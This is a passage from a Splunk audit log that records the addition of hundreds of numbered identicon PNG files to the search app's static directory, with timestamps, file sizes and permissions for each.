gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.538, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/78.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.534, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/779.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.530, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/778.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.526, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/777.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.520, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/776.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.516, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/775.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.513, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/774.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.509, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/773.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.503, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/772.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.497, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/771.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.492, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/770.png", isdir=0, size=283, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.487, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/77.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.483, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/769.png", isdir=0, size=402, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.478, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/768.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.472, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/767.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.469, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/766.png", isdir=0, size=293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.464, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/765.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.460, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/764.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.457, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/763.png", isdir=0, size=401, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.453, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/762.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.448, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/761.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.445, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/760.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.441, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/76.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.437, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/759.png", isdir=0, size=321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.433, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/758.png", isdir=0, size=297, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.429, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/757.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.426, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/756.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.423, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/755.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.419, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/754.png", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.416, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/753.png", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.412, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/752.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.408, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/751.png", isdir=0, size=278, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.404, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/750.png", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.401, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/75.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.396, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/749.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.391, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/748.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.386, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/747.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.382, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/746.png", isdir=0, size=291, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.377, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/745.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.373, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/744.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.368, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/743.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.363, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/742.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.354, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/741.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.346, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/740.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.338, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/74.png", isdir=0, size=334, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.334, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/739.png", isdir=0, size=337, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.328, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/738.png", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.324, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/737.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.320, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/736.png", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.316, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/735.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.311, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/734.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.308, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/733.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.304, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/732.png", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.300, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/731.png", isdir=0, size=377, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.294, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/730.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.290, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/73.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.286, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/729.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.282, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/728.png", isdir=0, size=313, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.276, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/727.png", isdir=0, size=309, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.272, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/726.png", isdir=0, size=401, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.267, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/725.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.263, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/724.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.259, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/723.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.255, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/722.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.251, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/721.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.247, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/720.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.242, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/72.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.238, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/719.png", isdir=0, size=334, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.233, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/718.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.229, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/717.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.225, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/716.png", isdir=0, size=351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.221, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/715.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.217, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/714.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.213, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/713.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.210, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/712.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.207, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/711.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.203, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/710.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.199, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/71.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.194, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/709.png", isdir=0, size=324, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.191, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/708.png", isdir=0, size=392, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.187, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/707.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.183, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/706.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.178, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/705.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.174, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/704.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.170, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/703.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.166, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/702.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.162, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/701.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.158, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/700.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.154, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/70.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.150, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/7.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.146, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/699.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.143, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/698.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.139, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/697.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.134, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/696.png", isdir=0, size=296, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.129, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/695.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.125, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/694.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.122, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/693.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.118, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/692.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.114, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/691.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.110, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/690.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.106, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/69.png", isdir=0, size=288, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.102, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/689.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.099, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/688.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.095, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/687.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.092, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/686.png", isdir=0, size=392, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.089, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/685.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.084, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/684.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.080, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/683.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.077, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/682.png", isdir=0, size=306, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.073, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/681.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.069, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/680.png", isdir=0, size=315, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.066, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/68.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.062, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/679.png", isdir=0, size=279, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.058, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/678.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.054, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/677.png", isdir=0, size=406, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.048, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/676.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.043, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/675.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.037, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/674.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.034, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/673.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.029, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/672.png", isdir=0, size=408, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.025, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/671.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.021, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/670.png", 